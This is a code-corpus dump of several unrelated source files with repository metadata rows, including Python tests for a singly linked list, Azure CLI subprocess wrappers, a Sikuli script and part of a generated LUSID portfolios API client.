if input_val == output_val : # OK
line_command.append("OK")
line_read.append("OK")
result_list.append(line_command)
result_list.append(line_read)
else:
if interval > input_duration: # enough to transit color or temperature to the target point
if (interval - input_duration) <= PADDING_FOR_TIME:
e = "Error : The interval value may be short compared to the transition time."
line_command.append(e)
line_read.append(e)
result_list.append(line_command)
result_list.append(line_read)
elif (abs(output_val - input_val) <= PADDING_FOR_VALUE):
e = "Error : The distance between the input value and the output value is too far for the given transition time."
line_command.append(e)
line_read.append(e)
result_list.append(line_command)
result_list.append(line_read)
else: # short to transit color or temperature to the target point
e = "Error : The interval value may be short compared to the transition time."
line_command.append(e)
line_read.append(e)
result_list.append(line_command)
result_list.append(line_read)
return result_list
| 60.090909
| 150
| 0.450419
| 707
| 7,271
| 4.420085
| 0.118812
| 0.13728
| 0.12288
| 0.1536
| 0.86656
| 0.85568
| 0.83808
| 0.82912
| 0.82912
| 0.8176
| 0
| 0.01193
| 0.481227
| 7,271
| 121
| 151
| 60.090909
| 0.816543
| 0.058864
| 0
| 0.736842
| 0
| 0.026316
| 0.123115
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.017544
| false
| 0
| 0.008772
| 0
| 0.052632
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f0b711bb00a84be4abca7380c301fa6fe291a34d
| 6,084
|
py
|
Python
|
SinglyLinkedList/tests.py
|
jeremy2918/data-structures
|
17685212aac38979929ca923eb2f9b989c74d07a
|
[
"MIT"
] | 1
|
2021-12-14T19:57:28.000Z
|
2021-12-14T19:57:28.000Z
|
SinglyLinkedList/tests.py
|
jeremy2918/data-structures
|
17685212aac38979929ca923eb2f9b989c74d07a
|
[
"MIT"
] | null | null | null |
SinglyLinkedList/tests.py
|
jeremy2918/data-structures
|
17685212aac38979929ca923eb2f9b989c74d07a
|
[
"MIT"
] | null | null | null |
import unittest
from singly_linked_list import SinglyLinkedList, Node
class TestSinglyLinkedList(unittest.TestCase):
def test_node(self):
node = Node(0)
self.assertEqual(node.data, 0)
self.assertEqual(node.next, None)
def test_inti(self):
llist = SinglyLinkedList()
self.assertEqual(llist.size, 0)
self.assertEqual(llist.head, None)
llist = SinglyLinkedList(5)
self.assertEqual(llist.size, 1)
self.assertEqual(llist.head.data, 5)
llist = SinglyLinkedList([1, 2, 3])
self.assertEqual(llist.size, 3)
self.assertEqual(llist.head.data, 1)
self.assertEqual(llist.head.next.data, 2)
self.assertEqual(llist.head.next.next.data, 3)
def test_clear(self):
llist = SinglyLinkedList()
llist.insert_first(0)
self.assertEqual(llist.size, 1)
self.assertEqual(llist.head.data, 0)
llist.clear()
self.assertEqual(llist.size, 0)
self.assertEqual(llist.head, None)
def test_is_empty(self):
llist = SinglyLinkedList()
self.assertTrue(llist.is_empty())
llist.insert_first(0)
self.assertFalse(llist.is_empty())
def test_insert_first(self):
llist = SinglyLinkedList()
llist.insert_first(1)
self.assertEqual(llist.size, 1)
self.assertEqual(llist.head.data, 1)
llist.insert_first(0)
self.assertEqual(llist.size, 2)
self.assertEqual(llist.head.data, 0)
self.assertEqual(llist.head.next.data, 1)
def test_insert_last(self):
llist = SinglyLinkedList()
llist.insert_last(0)
self.assertEqual(llist.size, 1)
self.assertEqual(llist.head.data, 0)
llist.insert_last(1)
self.assertEqual(llist.size, 2)
self.assertEqual(llist.head.data, 0)
self.assertEqual(llist.head.next.data, 1)
def test_insert_at(self):
llist = SinglyLinkedList()
self.assertRaises(Exception, llist.insert_at, 1, 0)
llist.insert_at(0, 0)
self.assertEqual(llist.size, 1)
self.assertEqual(llist.head.data, 0)
llist.insert_at(0, -1)
self.assertEqual(llist.size, 2)
self.assertEqual(llist.head.data, -1)
self.assertEqual(llist.head.next.data, 0)
llist.insert_at(2, 1)
self.assertEqual(llist.size, 3)
self.assertEqual(llist.head.data, -1)
self.assertEqual(llist.head.next.data, 0)
self.assertEqual(llist.head.next.next.data, 1)
def test_peek_first(self):
llist = SinglyLinkedList()
self.assertRaises(Exception, llist.peek_first)
llist.insert_first(0)
self.assertEqual(llist.peek_first(), 0)
llist.insert_first(-1)
self.assertEqual(llist.peek_first(), -1)
def test_peek_last(self):
llist = SinglyLinkedList()
self.assertRaises(Exception, llist.peek_last)
llist.insert_first(0)
self.assertEqual(llist.peek_last(), 0)
llist.insert_first(-1)
self.assertEqual(llist.peek_last(), 0)
def test_remove_first(self):
llist = SinglyLinkedList()
self.assertRaises(Exception, llist.remove_first)
llist.insert_last(0)
llist.insert_last(1)
llist.insert_last(2)
self.assertEqual(llist.remove_first(), 0)
self.assertEqual(llist.size, 2)
self.assertEqual(llist.head.data, 1)
self.assertEqual(llist.remove_first(), 1)
self.assertEqual(llist.size, 1)
self.assertEqual(llist.head.data, 2)
self.assertEqual(llist.remove_first(), 2)
self.assertEqual(llist.size, 0)
self.assertEqual(llist.head, None)
def test_remove_last(self):
llist = SinglyLinkedList()
self.assertRaises(Exception, llist.remove_last)
llist.insert_last(0)
llist.insert_last(1)
llist.insert_last(2)
self.assertEqual(llist.remove_last(), 2)
self.assertEqual(llist.size, 2)
self.assertEqual(llist.head.next.next, None)
self.assertEqual(llist.remove_last(), 1)
self.assertEqual(llist.size, 1)
self.assertEqual(llist.head.next, None)
self.assertEqual(llist.remove_last(), 0)
self.assertEqual(llist.size, 0)
self.assertEqual(llist.head, None)
def test_remove(self):
llist = SinglyLinkedList()
self.assertRaises(Exception, llist.remove)
llist.insert_last(0)
llist.insert_last(1)
llist.insert_last(2)
llist.insert_last(3)
self.assertEqual(llist.remove(0), 0)
self.assertEqual(llist.size, 3)
self.assertEqual(llist.head.data, 1)
self.assertEqual(llist.remove(2), 2)
self.assertEqual(llist.size, 2)
self.assertEqual(llist.head.data, 1)
self.assertEqual(llist.head.next.data, 3)
self.assertEqual(llist.remove(3), 3)
self.assertEqual(llist.size, 1)
self.assertEqual(llist.head.data, 1)
self.assertEqual(llist.head.next, None)
self.assertEqual(llist.remove(1), 1)
self.assertEqual(llist.size, 0)
self.assertEqual(llist.head, None)
def test_index_of(self):
llist = SinglyLinkedList()
llist.insert_last(0)
llist.insert_last(1)
llist.insert_last(2)
self.assertEqual(llist.index_of(0), 0)
self.assertEqual(llist.index_of(1), 1)
self.assertEqual(llist.index_of(2), 2)
self.assertEqual(llist.index_of(3), -1)
def test_contains(self):
llist = SinglyLinkedList()
llist.insert_first(0)
self.assertTrue(llist.contains(0))
self.assertFalse(llist.contains(1))
def test_contains(self):
llist = SinglyLinkedList()
llist.insert_last(1)
llist.insert_last(2)
llist.insert_last(3)
llist.reverse()
self.assertEqual(llist.head.data, 3)
self.assertEqual(llist.head.next.data, 2)
self.assertEqual(llist.head.next.next.data, 1)
if __name__ == '__main__':
unittest.main()
| 32.361702
| 59
| 0.636423
| 755
| 6,084
| 5.015894
| 0.062252
| 0.30103
| 0.390811
| 0.215474
| 0.859255
| 0.801162
| 0.772379
| 0.72564
| 0.593346
| 0.546607
| 0
| 0.025402
| 0.242932
| 6,084
| 187
| 60
| 32.534759
| 0.796787
| 0
| 0
| 0.606452
| 0
| 0
| 0.001315
| 0
| 0
| 0
| 0
| 0
| 0.554839
| 1
| 0.096774
| false
| 0
| 0.012903
| 0
| 0.116129
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
f0c50d880cd081a33d975ac8dc296bc775722dfd
| 3,183
|
py
|
Python
|
test/pyaz/network/application_gateway/http_settings/__init__.py
|
bigdatamoore/py-az-cli
|
54383a4ee7cc77556f6183e74e992eec95b28e01
|
[
"MIT"
] | null | null | null |
test/pyaz/network/application_gateway/http_settings/__init__.py
|
bigdatamoore/py-az-cli
|
54383a4ee7cc77556f6183e74e992eec95b28e01
|
[
"MIT"
] | 9
|
2021-09-24T16:37:24.000Z
|
2021-12-24T00:39:19.000Z
|
test/pyaz/network/application_gateway/http_settings/__init__.py
|
bigdatamoore/py-az-cli
|
54383a4ee7cc77556f6183e74e992eec95b28e01
|
[
"MIT"
] | null | null | null |
import json, subprocess
from .... pyaz_utils import get_cli_name, get_params
def list(resource_group, gateway_name):
params = get_params(locals())
command = "az network application-gateway http-settings list " + params
print(command)
output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout = output.stdout.decode("utf-8")
stderr = output.stderr.decode("utf-8")
if stdout:
return json.loads(stdout)
print(stdout)
else:
raise Exception(stderr)
print(stderr)
def show(resource_group, gateway_name, name):
params = get_params(locals())
command = "az network application-gateway http-settings show " + params
print(command)
output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout = output.stdout.decode("utf-8")
stderr = output.stderr.decode("utf-8")
if stdout:
return json.loads(stdout)
print(stdout)
else:
raise Exception(stderr)
print(stderr)
def delete(resource_group, gateway_name, name, no_wait=None):
params = get_params(locals())
command = "az network application-gateway http-settings delete " + params
print(command)
output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout = output.stdout.decode("utf-8")
stderr = output.stderr.decode("utf-8")
if stdout:
return json.loads(stdout)
print(stdout)
else:
raise Exception(stderr)
print(stderr)
def create(resource_group, gateway_name, name, port, probe=None, protocol=None, cookie_based_affinity=None, timeout=None, connection_draining_timeout=None, host_name=None, host_name_from_backend_pool=None, affinity_cookie_name=None, enable_probe=None, path=None, auth_certs=None, root_certs=None, no_wait=None):
params = get_params(locals())
command = "az network application-gateway http-settings create " + params
print(command)
output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout = output.stdout.decode("utf-8")
stderr = output.stderr.decode("utf-8")
if stdout:
return json.loads(stdout)
print(stdout)
else:
raise Exception(stderr)
print(stderr)
def update(resource_group, gateway_name, name, port=None, probe=None, protocol=None, cookie_based_affinity=None, timeout=None, connection_draining_timeout=None, host_name=None, host_name_from_backend_pool=None, affinity_cookie_name=None, enable_probe=None, path=None, auth_certs=None, root_certs=None, set=None, add=None, remove=None, force_string=None, no_wait=None):
params = get_params(locals())
command = "az network application-gateway http-settings update " + params
print(command)
output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout = output.stdout.decode("utf-8")
stderr = output.stderr.decode("utf-8")
if stdout:
return json.loads(stdout)
print(stdout)
else:
raise Exception(stderr)
print(stderr)
| 43.013514
| 368
| 0.702482
| 408
| 3,183
| 5.355392
| 0.166667
| 0.064073
| 0.045767
| 0.05492
| 0.921281
| 0.897483
| 0.868192
| 0.868192
| 0.868192
| 0.868192
| 0
| 0.00386
| 0.185988
| 3,183
| 73
| 369
| 43.60274
| 0.839444
| 0
| 0
| 0.820896
| 0
| 0
| 0.096136
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.074627
| false
| 0
| 0.029851
| 0
| 0.179104
| 0.223881
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f0c999191e15d16526a0ca151847f851f6bc5d85
| 136
|
py
|
Python
|
sikuli-ide/sample-scripts/vdict.sikuli/vdict.py
|
mgrundy/sikuli
|
4adaab7880d2f3e14702ca7287ae9c9e4f4de9ab
|
[
"MIT"
] | 1,292
|
2015-01-09T17:48:46.000Z
|
2022-03-30T20:08:15.000Z
|
sikuli-ide/sample-scripts/vdict.sikuli/vdict.py
|
mgrundy/sikuli
|
4adaab7880d2f3e14702ca7287ae9c9e4f4de9ab
|
[
"MIT"
] | 31
|
2015-01-20T15:01:24.000Z
|
2022-03-03T11:02:06.000Z
|
sikuli-ide/sample-scripts/vdict.sikuli/vdict.py
|
mgrundy/sikuli
|
4adaab7880d2f3e14702ca7287ae9c9e4f4de9ab
|
[
"MIT"
] | 267
|
2015-02-08T19:51:25.000Z
|
2022-03-19T22:16:01.000Z
|
d = VDict()
d["1254083940668.png"] = "hello"
print d["1254083940668.png"]
print d.get1("1254083940668.png")
print d["1254085132550.png"]
| 27.2
| 33
| 0.720588
| 19
| 136
| 5.157895
| 0.421053
| 0.489796
| 0.346939
| 0.44898
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.424
| 0.080882
| 136
| 5
| 34
| 27.2
| 0.36
| 0
| 0
| 0
| 0
| 0
| 0.532847
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0.6
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 9
|
f0e82c3542a2116b42faccc68cb072914814ca6e
| 106
|
py
|
Python
|
test/test_view.py
|
bressanmarcos/PythonApp
|
5c5717fb776f5b3b574a9aebd6041368cd7473a1
|
[
"MIT"
] | null | null | null |
test/test_view.py
|
bressanmarcos/PythonApp
|
5c5717fb776f5b3b574a9aebd6041368cd7473a1
|
[
"MIT"
] | null | null | null |
test/test_view.py
|
bressanmarcos/PythonApp
|
5c5717fb776f5b3b574a9aebd6041368cd7473a1
|
[
"MIT"
] | null | null | null |
from view.view import View # pylint: disable=no-name-in-module,import-error
def test_model():
pass
| 17.666667
| 76
| 0.726415
| 17
| 106
| 4.470588
| 0.823529
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.160377
| 106
| 5
| 77
| 21.2
| 0.853933
| 0.433962
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0.333333
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 7
|
0b0ae4ac155ff26ebee6bf09e7f473800b132152
| 227
|
py
|
Python
|
Intermediate/Day6/3ListComprehensionsDemos/listcomprehensiondemo1.py
|
vishipayyallore/LearningPython_2019
|
f72d5af61ad96721442b7ebfc33518c2a879eb64
|
[
"MIT"
] | null | null | null |
Intermediate/Day6/3ListComprehensionsDemos/listcomprehensiondemo1.py
|
vishipayyallore/LearningPython_2019
|
f72d5af61ad96721442b7ebfc33518c2a879eb64
|
[
"MIT"
] | null | null | null |
Intermediate/Day6/3ListComprehensionsDemos/listcomprehensiondemo1.py
|
vishipayyallore/LearningPython_2019
|
f72d5af61ad96721442b7ebfc33518c2a879eb64
|
[
"MIT"
] | null | null | null |
numbers = [i for i in range(1,11)]
print(numbers)
numbers = [i*2 for i in range(1,11)]
print(numbers)
numbers = [i*i*i for i in range(1,11)]
print(numbers)
numbers = [i**2 for i in range(1,11)]
print(f'Squares: {numbers}')
| 17.461538
| 38
| 0.651982
| 46
| 227
| 3.217391
| 0.23913
| 0.216216
| 0.162162
| 0.297297
| 0.844595
| 0.844595
| 0.844595
| 0.844595
| 0.844595
| 0.844595
| 0
| 0.073684
| 0.162996
| 227
| 12
| 39
| 18.916667
| 0.705263
| 0
| 0
| 0.375
| 0
| 0
| 0.079646
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.5
| 0
| 0
| 0
| null | 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 9
|
9bf0ba235887d934eb1ac99082e7ef6b2f2d126a
| 117
|
py
|
Python
|
utils/__init__.py
|
WangXuhongCN/IJCAI20-GNNs
|
ec7d11c5ae2f91f4165e384131c6a8358836ff58
|
[
"MIT"
] | 3
|
2020-05-12T06:05:56.000Z
|
2020-06-07T13:56:07.000Z
|
utils/__init__.py
|
WangXuhongCN/IJCAI20-GNNs
|
ec7d11c5ae2f91f4165e384131c6a8358836ff58
|
[
"MIT"
] | null | null | null |
utils/__init__.py
|
WangXuhongCN/IJCAI20-GNNs
|
ec7d11c5ae2f91f4165e384131c6a8358836ff58
|
[
"MIT"
] | null | null | null |
from .evaluate import fixed_graph_evaluate, multi_graph_evaluate
from .evaluate import thresholding,baseline_evaluate
| 58.5
| 64
| 0.897436
| 15
| 117
| 6.666667
| 0.533333
| 0.24
| 0.36
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.068376
| 117
| 2
| 65
| 58.5
| 0.917431
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
9bf698ba4d9ac0e464264c4f96ec7e275cbb97aa
| 1,408
|
py
|
Python
|
_src/doxygen/test_template_annotator.py
|
Yashwants19/mlpack.org
|
74ca59002a72a3f891564ddddd8a7776086af5ab
|
[
"MIT"
] | null | null | null |
_src/doxygen/test_template_annotator.py
|
Yashwants19/mlpack.org
|
74ca59002a72a3f891564ddddd8a7776086af5ab
|
[
"MIT"
] | null | null | null |
_src/doxygen/test_template_annotator.py
|
Yashwants19/mlpack.org
|
74ca59002a72a3f891564ddddd8a7776086af5ab
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python
from template_annotator import TemplateAnnotator
t = TemplateAnnotator()
a = t.grammar.parseString('template < typename A >')
print a.asXML('div')
print ''
#a = t.grammar.parseString('template < >')
#print a.asXML('div')
#print ''
a = t.grammar.parseString('template < typename A, typename B >')
print a.asXML('div')
print ''
a = t.grammar.parseString('template<typename A>')
print a.asXML('div')
print ''
a = t.grammar.parseString("template<typename VecType >")
print a.asXML('div')
print ''
a = t.grammar.parseString("template<typename MetricType, typename StatisticType = EmptyStatistic, typename MatType = arma::mat >")
print a.asXML('div')
print ''
a = t.grammar.parseString('template < template < typename A > class B >')
print a.asXML('div')
print ''
a = t.grammar.parseString('template<typename MetricType, typename StatisticType = EmptyStatistic, typename MatType = arma::mat, template< typename BoundMetricType > class BoundType = bound::HRectBound, template< typename SplitBoundType, typename SplitMatType > class SplitType = MidpointSplit >')
#a = t.grammar.parseString('template<template< typename BoundMetricType > class BoundType = bound::HRectBound, template< typename SplitBoundType, typename SplitMatType > class SplitType = MidpointSplit >')
print a.asXML('div')
print ''
| 32
| 314
| 0.733665
| 186
| 1,408
| 5.548387
| 0.188172
| 0.087209
| 0.19186
| 0.174419
| 0.908915
| 0.906008
| 0.887597
| 0.887597
| 0.887597
| 0.841085
| 0
| 0
| 0.115057
| 1,408
| 43
| 315
| 32.744186
| 0.82825
| 0.222301
| 0
| 0.695652
| 0
| 0.086957
| 0.548624
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.043478
| null | null | 0.608696
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 10
|
5029d6f959025ea6d0a23428a37f7e90ee7b6aa6
| 75
|
py
|
Python
|
Revether/revether.py
|
Revether/Revether
|
06c6e1e9cc4578cc01ea57481087eaf69ae099d7
|
[
"BSD-3-Clause"
] | 1
|
2019-10-01T18:43:39.000Z
|
2019-10-01T18:43:39.000Z
|
Revether/revether.py
|
Revether/Revether
|
06c6e1e9cc4578cc01ea57481087eaf69ae099d7
|
[
"BSD-3-Clause"
] | 2
|
2019-10-01T09:04:28.000Z
|
2019-10-04T11:29:06.000Z
|
Revether/revether.py
|
Revether/Revether
|
06c6e1e9cc4578cc01ea57481087eaf69ae099d7
|
[
"BSD-3-Clause"
] | null | null | null |
from revether.plugin import Plugin
def PLUGIN_ENTRY():
return Plugin()
| 18.75
| 34
| 0.76
| 10
| 75
| 5.6
| 0.7
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.16
| 75
| 4
| 35
| 18.75
| 0.888889
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
506058a494f99e8c552a7ae371a6e8a982481b89
| 104
|
py
|
Python
|
students/context_processors.py
|
Ostap1807/django-studentsdb
|
5f1ed823c6254e066668883149d00a4012a12580
|
[
"MIT"
] | null | null | null |
students/context_processors.py
|
Ostap1807/django-studentsdb
|
5f1ed823c6254e066668883149d00a4012a12580
|
[
"MIT"
] | 1
|
2017-12-13T16:26:58.000Z
|
2017-12-13T16:26:58.000Z
|
students/context_processors.py
|
Ostap1807/django-studentsdb
|
5f1ed823c6254e066668883149d00a4012a12580
|
[
"MIT"
] | 1
|
2019-09-24T13:08:17.000Z
|
2019-09-24T13:08:17.000Z
|
from .util import get_groups
def groups_processor(request):
return {'GROUPS': get_groups(request)}
| 20.8
| 42
| 0.759615
| 14
| 104
| 5.428571
| 0.642857
| 0.236842
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.134615
| 104
| 4
| 43
| 26
| 0.844444
| 0
| 0
| 0
| 0
| 0
| 0.057692
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
acbd4656c58bc6b7459c7d826d2ce360bfd7e392
| 134,774
|
py
|
Python
|
sdk/lusid/api/portfolios_api.py
|
finbourne/lusid-sdk-python
|
d238c5c661908639dab57d026966630448bfb0d6
|
[
"MIT"
] | 6
|
2018-06-19T15:50:17.000Z
|
2022-03-26T22:53:16.000Z
|
sdk/lusid/api/portfolios_api.py
|
finbourne/lusid-sdk-python
|
d238c5c661908639dab57d026966630448bfb0d6
|
[
"MIT"
] | 41
|
2019-02-08T09:18:04.000Z
|
2022-02-09T16:20:46.000Z
|
sdk/lusid/api/portfolios_api.py
|
finbourne/lusid-sdk-python
|
d238c5c661908639dab57d026966630448bfb0d6
|
[
"MIT"
] | 7
|
2019-09-03T15:38:27.000Z
|
2021-04-02T10:30:32.000Z
|
# coding: utf-8
"""
LUSID API
FINBOURNE Technology # noqa: E501
The version of the OpenAPI document: 0.11.3648
Contact: info@finbourne.com
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from lusid.api_client import ApiClient
from lusid.exceptions import ( # noqa: F401
ApiTypeError,
ApiValueError
)
class PortfoliosApi(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def delete_portfolio(self, scope, code, **kwargs): # noqa: E501
"""DeletePortfolio: Delete portfolio # noqa: E501
Delete a particular portfolio. The deletion will take effect from the portfolio's creation datetime. This means that the portfolio will no longer exist at any effective datetime, as per the asAt datetime of deletion. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_portfolio(scope, code, async_req=True)
>>> result = thread.get()
:param scope: The scope of the portfolio. (required)
:type scope: str
:param code: The code of the portfolio. Together with the scope this uniquely identifies the portfolio. (required)
:type code: str
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: DeletedEntityResponse
"""
kwargs['_return_http_data_only'] = True
return self.delete_portfolio_with_http_info(scope, code, **kwargs) # noqa: E501
def delete_portfolio_with_http_info(self, scope, code, **kwargs): # noqa: E501
"""DeletePortfolio: Delete portfolio # noqa: E501
Delete a particular portfolio. The deletion will take effect from the portfolio's creation datetime. This means that the portfolio will no longer exist at any effective datetime, as per the asAt datetime of deletion. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_portfolio_with_http_info(scope, code, async_req=True)
>>> result = thread.get()
:param scope: The scope of the portfolio. (required)
:type scope: str
:param code: The code of the portfolio. Together with the scope this uniquely identifies the portfolio. (required)
:type code: str
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data without head status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for an a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: tuple(DeletedEntityResponse, status_code(int), headers(HTTPHeaderDict))
"""
local_var_params = locals()
all_params = [
'scope',
'code'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_portfolio" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
if self.api_client.client_side_validation and ('scope' in local_var_params and # noqa: E501
len(local_var_params['scope']) > 64): # noqa: E501
raise ApiValueError("Invalid value for parameter `scope` when calling `delete_portfolio`, length must be less than or equal to `64`") # noqa: E501
if self.api_client.client_side_validation and ('scope' in local_var_params and # noqa: E501
len(local_var_params['scope']) < 1): # noqa: E501
raise ApiValueError("Invalid value for parameter `scope` when calling `delete_portfolio`, length must be greater than or equal to `1`") # noqa: E501
if self.api_client.client_side_validation and 'scope' in local_var_params and not re.search(r'^[a-zA-Z0-9\-_]+$', local_var_params['scope']): # noqa: E501
raise ApiValueError("Invalid value for parameter `scope` when calling `delete_portfolio`, must conform to the pattern `/^[a-zA-Z0-9\-_]+$/`") # noqa: E501
if self.api_client.client_side_validation and ('code' in local_var_params and # noqa: E501
len(local_var_params['code']) > 64): # noqa: E501
raise ApiValueError("Invalid value for parameter `code` when calling `delete_portfolio`, length must be less than or equal to `64`") # noqa: E501
if self.api_client.client_side_validation and ('code' in local_var_params and # noqa: E501
len(local_var_params['code']) < 1): # noqa: E501
raise ApiValueError("Invalid value for parameter `code` when calling `delete_portfolio`, length must be greater than or equal to `1`") # noqa: E501
if self.api_client.client_side_validation and 'code' in local_var_params and not re.search(r'^[a-zA-Z0-9\-_]+$', local_var_params['code']): # noqa: E501
raise ApiValueError("Invalid value for parameter `code` when calling `delete_portfolio`, must conform to the pattern `/^[a-zA-Z0-9\-_]+$/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'scope' in local_var_params:
path_params['scope'] = local_var_params['scope'] # noqa: E501
if 'code' in local_var_params:
path_params['code'] = local_var_params['code'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['text/plain', 'application/json', 'text/json']) # noqa: E501
header_params['Accept-Encoding'] = "gzip, deflate, br"
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
response_types_map = {
200: "DeletedEntityResponse",
400: "LusidValidationProblemDetails",
}
return self.api_client.call_api(
'/api/portfolios/{scope}/{code}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_types_map=response_types_map,
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
